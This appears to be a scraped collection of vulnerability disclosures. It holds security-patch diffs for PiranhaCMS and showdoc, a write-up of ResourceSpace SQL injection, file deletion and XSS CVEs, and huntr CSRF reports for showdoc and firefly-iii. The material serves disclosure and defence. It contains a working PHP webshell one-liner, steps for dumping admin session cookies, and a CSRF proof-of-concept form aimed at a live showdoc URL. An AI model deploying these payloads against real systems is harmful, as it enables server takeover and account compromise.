await \_service.ApproveAsync(model.Id).ConfigureAwait(false);

  

var result \= await List(parentId);

var result \= await List(model.ParentId).ConfigureAwait(false);

  

result.Status \= new StatusMessage

{

@@ -67,14 +74,14 @@ public async Task<CommentListModel> Approve(Guid id, Guid? parentId = null)

return result;

}

  

\[Route("unapprove/{id}/{parentId?}")\]

\[HttpGet\]

\[Route("unapprove")\]

\[HttpPost\]

\[Authorize(Policy \= Permission.CommentsApprove)\]

public async Task<CommentListModel\> UnApprove(Guid id, Guid? parentId \= null)

public async Task<CommentListModel\> UnApprove(ApprovalModel model)

{

await \_service.UnApproveAsync(id);

await \_service.UnApproveAsync(model.Id).ConfigureAwait(false);

  

var result \= await List(parentId);

var result \= await List(model.ParentId).ConfigureAwait(false);

  

result.Status \= new StatusMessage

{

@@ -84,12 +91,12 @@ public async Task<CommentListModel> UnApprove(Guid id, Guid? parentId = null)

return result;

}

  

\[Route("delete/{id}")\]

\[HttpGet\]

\[Route("delete")\]

\[HttpDelete\]

\[Authorize(Policy \= Permission.CommentsDelete)\]

public async Task<StatusMessage\> Delete(Guid id)

public async Task<StatusMessage\> Delete(\[FromBody\]Guid id)

{

await \_service.DeleteAsync(id);

await \_service.DeleteAsync(id).ConfigureAwait(false);

  

var result \= new StatusMessage

{

@@ -22,6 +22,7 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/config")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class ConfigApiController : Controller

{

private readonly ConfigService \_service;

@@ -25,6 +25,7 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/content")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class ContentApiController : Controller

{

private readonly IApi \_api;

@@ -228,10 +229,10 @@ public async Task<ContentEditModel> Save(ContentEditModel model)

/// </summary\>

/// <param name\="id"\>The unique id</param\>

/// <returns\>The result of the operation</returns\>

\[Route("delete/{id}")\]

\[HttpGet\]

\[Route("delete")\]

\[HttpDelete\]

\[Authorize(Policy \= Permission.ContentDelete)\]

public async Task<StatusMessage\> Delete(Guid id)

public async Task<StatusMessage\> Delete(\[FromBody\]Guid id)

{

try

{

@@ -14,7 +14,6 @@

using Microsoft.AspNetCore.Mvc;

using Piranha.Manager.Models;

using Piranha.Manager.Services;

using Piranha.Models;

  

namespace Piranha.Manager.Controllers

{

@@ -25,6 +24,7 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/language")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class LanguageApiController : Controller

{

private readonly LanguageService \_service;

@@ -56,16 +56,62 @@ public async Task<LanguageEditModel> Get()

/// <param name\="model"\>The model</param\>

\[Route("")\]

\[HttpPost\]

public async Task<LanguageEditModel\> Save(LanguageEditModel model)

public async Task<IActionResult\> Save(LanguageEditModel model)

{

return await \_service.Save(model);

try

{

var result \= await \_service.Save(model);

  

result.Status \= new StatusMessage

{

Type \= StatusMessage.Success,

Body \= \_localizer.Language\["The language was successfully saved"\]

};

  

return Ok(result);

}

catch (Exception e)

{

var result \= new LanguageEditModel();

result.Status \= new StatusMessage

{

Type \= StatusMessage.Error,

Body \= e.Message

};

return BadRequest(result);

}

}

  

/// <summary\>

/// Deletes the language with the given id.

/// </summary\>

/// <param name\="id"\>The unique id</param\>

\[Route("{id}")\]

\[HttpDelete\]

public async Task<LanguageEditModel\> Delete(Guid id)

public async Task<IActionResult\> Delete(Guid id)

{

return await \_service.Delete(id);

try

{

var result \= await \_service.Delete(id);

  

result.Status \= new StatusMessage

{

Type \= StatusMessage.Success,

Body \= \_localizer.Language\["The language was successfully deleted"\]

};

  

return Ok(result);

}

catch (Exception e)

{

var result \= new LanguageEditModel();

result.Status \= new StatusMessage

{

Type \= StatusMessage.Error,

Body \= e.Message

};

return BadRequest(result);

}

}

}

}

@@ -28,6 +28,7 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/media")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class MediaApiController : Controller

{

private readonly MediaService \_service;

@@ -153,10 +154,10 @@ public async Task<IActionResult> SaveFolder(MediaFolderModel model, MediaType? f

}

}

  

\[Route("folder/delete/{id:Guid}")\]

\[HttpGet\]

\[Route("folder/delete")\]

\[HttpDelete\]

\[Authorize(Policy \= Permission.MediaDeleteFolder)\]

public async Task<IActionResult\> DeleteFolder(Guid id)

public async Task<IActionResult\> DeleteFolder(\[FromBody\]Guid id)

{

try

{

@@ -299,7 +300,7 @@ public async Task<IActionResult> Move(\[FromBody\] IEnumerable<Guid> items, Guid?

}

  

\[Route("delete")\]

\[HttpPost\]

\[HttpDelete\]

\[Consumes("application/json")\]

\[Authorize(Policy \= Permission.MediaDelete)\]

public async Task<IActionResult\> Delete(\[FromBody\] IEnumerable<Guid\> items)

@@ -23,6 +23,7 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/module")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class ModuleApiController : Controller

{

private readonly ModuleService \_service;

CVE-2021-25976: Merge pull request #1742 from PiranhaCMS/features/manager-security-up… · PiranhaCMS/piranha.core@e42abac

A SQL injection issue in pages/edit_fields/9_ajax/add_keyword.php of ResourceSpace 9.5 and 9.6 < rev 18274 allows remote unauthenticated attackers to execute arbitrary SQL commands via the k parameter. This allows attackers to uncover the full contents of the ResourceSpace database, including user session cookies. An attacker who gets an admin user session cookie can use the session cookie to execute arbitrary code on the server.

A few months ago, while scanning the external attack surface of one of our clients, our autonomous pentesting product NodeZero identified an instance of an application called ResourceSpace exposed to the Internet. ResourceSpace is a digital asset management tool that enables users to organize their digital assets. We thought it was interesting that no vulnerabilities had been publicly disclosed against the product since 2015. So we decided to pull down the latest source code to take a closer look.

During our assessment of the ResourceSpace code base, we found three new vulnerabilities that could be exploited by an unauthenticated attacker. The most critical is CVE-2021-41765, a pre-auth SQL injection that an attacker can abuse to gain remote code execution (RCE) privileges on the ResourceSpace server. The other two vulnerabilities identified were CVE-2021-41950, a path traversal vulnerability that can be used to delete arbitrary files on the file system, and CVE-2021-41951, a reflected cross-site scripting (XSS) vulnerability. All three vulnerabilities were promptly patched by the vendor, Montala Limited.

**CVE-2021-41765: Unauthenticated SQLi to RCE Chain**

ResourceSpace is an older-generation PHP application in which many of the core functions and libraries used for input sanitization were built from scratch. SQL queries are built using string concatenation, and to prevent SQL injection, certain functions like `escape_check` and `getvalescaped` are used extensively throughout the code base to sanitize input variables. It requires discipline on the part of developers to consistently apply these sanitization functions.

ResourceSpace 9.5 was released in March 2021, and one of the new features announced as part of that release was “external upload shares.” This feature makes it possible for users without ResourceSpace accounts to upload content to ResourceSpace. To implement this feature, changes were made to the authentication and authorization logic. Those changes inadvertently introduced this vulnerability, specifically we found one instance where an input parameter was not getting sanitized. This is parameter `k` in the file `pages/edit_fields/9_ajax/add_keyword.php`:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-code1-1024x347.png)

Parameter `k` represents an authorization key for an external share, and its value is passed to the `check_access_key_collection` function in `include/user_functions.php`. Along with `k`, an identifier for the external share, `upload_collection`, is also passed into the `check_access_key_collection` function. Upon futher inspection, it turns out that the value of `upload_collection` can be passed in from a cookie called `upload_share_active`, and the value of 1 can always be used for this share even if no external shares have been set up by the ResourceSpace admin.

The function `check_access_key_collection` takes in the value of `k` as the `$key` variable and directly sends it to a SQL query, resulting in the SQL injection vulnerability.

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-code2-1024x575.png)

We used `sqlmap` to confirm the SQL injection in a local test environment. `sqlmap` confirmed the injection as a boolean-based blind SQL injection.

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-proof-of-sqli-1024x466.png)

**From SQLi to Admin Access**

The unauthenticated SQL injection allows an attacker to dump the entire contents of the ResourceSpace database. We found that this data includes users’ session cookies, which are stored in the `session` column in the `user` table. If the admin’s session cookie is in the database, an attacker can abuse the SQL injection to get access as an admin user.

Using `sqlmap` to dump all usernames, password hashes, and session cookies:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-getting-admin-session-cookie-1024x519.png)

Once the session cookie was captured we were able to set the stolen session cookie in the web browser to access the ResourceSpace home page:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-adding-admin-session-cookie-1024x368.png)

**From Admin Access to RCE**

It is very common for admin access to a web application to result in remote code execution privileges on the underlying server. We’ve described this phenomenon in several previous posts:

*   CVE-2021-27927: CSRF to RCE in Zabbix
    
*   Unauthenticated XSS to Remote Code Execution Chain in Mautic < 3.2.4
    
*   Hack The Box – Jerry
    

In the case of ResourceSpace, we found that an admin could upload a plugin containing arbitrary PHP files to the server, and then execute those PHP files.

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-plugin-upload-871x1024.png)

The process for creating a plugin is described here. A plugin is a `tar.gz` file renamed to have the `.rsp` extension. We dropped in a basic webshell as part of the plugin archive file:

`<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>%   `

Then uploaded it to the server and accessed it to dump the contents of the `/etc/passwd` file:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln1-using-plugin-to-get-rce-1024x642.png)

**CVE-2021-41950: Path Traversal Leading to Arbitrary File Deletion**

CVE-2021-41950 is a path traversal vulnerability in `pages/ajax/tiles.php`. The vulnerable code is here:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln2-code2-1024x760.png)

The `provider` and `variant` parameters are unsanitized, and they are used to construct a directory path `$tilecache`. If a file already exists at this directory path, it’s deleted. An unauthenticated attacker can therefore manipulate the `provider` and `variant` parameters to arbitrarily delete files as the web server user, including application source code and the ResourceSpace configuration file `config.php`. Deleting `config.php` is particularly concerning because it contains multiple application-specific secret keys, making the installation hard to recover unless it was recently backed up.

Here’s a `curl` command that exploits this vulnerability to delete the `config.php` file:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln2-request-to-delete-file-1024x541.png)

And the resulting denial of service impact:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln2-dos-1024x564.png)

**CVE-2021-41951: Reflected XSS**

CVE-2021-41951 is a reflected XSS vulnerability via the `wordpress_user` parameter in the file `plugins/wordpress_sso/pages/index.php`. The value of this parameter is echo’d back to the caller. This appears to be test code left behind in the install.

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln3-code1-1024x944.png)

Proving the XSS:

![](https://229wkr2a4mjg1d5wmb446w7h-wpengine.netdna-ssl.com/wp-content/uploads/2021/11/rs-vuln3-xss-1024x475.png)

To exploit this vulnerability, an attacker would need to convince a ResourceSpace user to click on a crafted link. If successful, an attacker can then run arbitrary code in the victim’s browser.

**Mitigation**

All reported vulnerabilities were promptly fixed by the vendor, Montala Limited. In addition to fixing the above vulnerabilities, the vendor also removed the ability for administrators to upload custom plugins through the web interface.

The critical pre-auth SQL injection vulnerability affects ResourceSpace version 9.5 through 9.6.18229. If you are on any of these versions, it is highly recommended that you update to the latest version of ResourceSpace.

The latest version of ResourceSpace as of this writing is 9.7, released on October 29, 2021.

**Timeline**

*   Sept. 25, 2021: Vulnerabilities disclosed to vendor
    
*   Sept. 27, 2021: All vulnerabilities fixed
    
*   Nov. 9, 2021: Public disclosure
    

**References**

*   CVE-2021-41765
    
*   CVE-2021-41950
    
*   CVE-2021-41951
    
*   ResourceSpace Product Versions
    
*   Patched version of pages/edit\_fields/9\_ajax/add\_keyword.php
    
*   Patched version of pages/ajax/tiles/php
    
*   index.php removed from WordPress SSO plugin

CVE-2021-41765: Multiple Vulnerabilities in ResourceSpace

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

Permalink

Showing with **16 additions** and **5 deletions**.

1.  +16 −5 server/Application/Api/Controller/UserController.class.php

@@ -42,8 +42,12 @@ public function register(){

unset($ret\['password'\]);

session("login\_user" , $ret );

$token = D("UserToken")->createToken($ret\['uid'\]);

cookie('cookie\_token',$token,array('expire'\=>60\*60\*24\*90,'httponly'\=>'httponly'));//此处由服务端控制token是否过期，所以cookies过期时间设置多久都无所谓

$this\->sendResult(array(

if(version\_compare(PHP\_VERSION,'7.3.0','>')){

setcookie('cookie\_token',$token,array('expires'\=>time()+60\*60\*24\*180,'httponly'\=>'httponly','samesite' => 'Strict','path'\=>'/'));

}else{

cookie('cookie\_token',$token,array('expire'\=>60\*60\*24\*180,'httponly'\=>'httponly'));

}

$this\->sendResult(array(

"uid" => $ret\['uid'\] ,

"username" => $ret\['username'\] ,

"name" => $ret\['name'\] ,

@@ -134,7 +138,11 @@ public function login(){

session("login\_user" , $ret );

D("User")->setLastTime($ret\['uid'\]);

$token = D("UserToken")->createToken($ret\['uid'\],60\*60\*24\*180);

cookie('cookie\_token',$token,array('expire'\=>60\*60\*24\*180,'httponly'\=>'httponly'));//此处由服务端控制token是否过期，所以cookies过期时间设置多久都无所谓

if(version\_compare(PHP\_VERSION,'7.3.0','>')){

setcookie('cookie\_token',$token,array('expires'\=>time()+60\*60\*24\*180,'httponly'\=>'httponly','samesite' => 'Strict','path'\=>'/'));

}else{

cookie('cookie\_token',$token,array('expire'\=>60\*60\*24\*180,'httponly'\=>'httponly'));

}

$this\->sendResult(array(

"uid" => $ret\['uid'\] ,

"username" => $ret\['username'\] ,

@@ -247,8 +255,11 @@ public function registerByVerify(){

unset($ret\['password'\]);

session("login\_user" , $ret );

$token = D("UserToken")->createToken($ret\['uid'\]);

cookie('cookie\_token',$token,array('expire'\=>60\*60\*24\*90,'httponly'\=>'httponly'));//此处由服务端控制token是否过期，所以cookies过期时间设置多久都无所谓

  

if(version\_compare(PHP\_VERSION,'7.3.0','>')){

setcookie('cookie\_token',$token,array('expires'\=>time()+60\*60\*24\*180,'httponly'\=>'httponly','samesite' => 'Strict','path'\=>'/'));

}else{

cookie('cookie\_token',$token,array('expire'\=>60\*60\*24\*180,'httponly'\=>'httponly'));

}

$this\->sendResult(array(

"uid" => $ret\['uid'\] ,

"username" => $ret\['username'\] ,

CVE-2021-3776: Strict cookie · star7th/showdoc@67093c8

**✍️ Description**

With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker site.

**🕵️‍♂️ Proof of Concept**

1.Open the PoC.html In Firefox or safari.

2.now you can check that member with email address `evil@mail.com` that already should registered befor have access to item with id `1531601670203340`.

// PoC.html

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
          <input type="hidden" name="item&#95;id" value="1531601670203340" />
          <input type="hidden" name="username" value="evil&#64;mail&#46;com" />
          <input type="hidden" name="cat&#95;id" value="0" />
          <input type="hidden" name="member&#95;group&#95;id" value="1" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    
    
    
    

**💥 Impact**

This vulnerability is capable of reveal any item.

**Fix**

Set SameSite attribute of cookies to `Lax` or `Strict`.

CVE-2021-3683: huntr: Cross-Site Request Forgery (CSRF) JavaScript Vulnerability in showdoc

firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF)

**Description**

Attacker is able to logout a user if a logged in user visits attacker website.

**Impact**

This vulnerability is capable of forging user to unintentional logout.

**Test**

Tested on Edge, firefox, chrome and safari.

**Fix**

You should use POST instead of GET/ANY.

**To expand:**

One way GET/ANY could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" ANYWHERE on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a @csrf token.

**Note**

While this cannot harm a users account it can be a great annoyance and is considered a valid CSRF.

**Occurences**

Tag

#csrf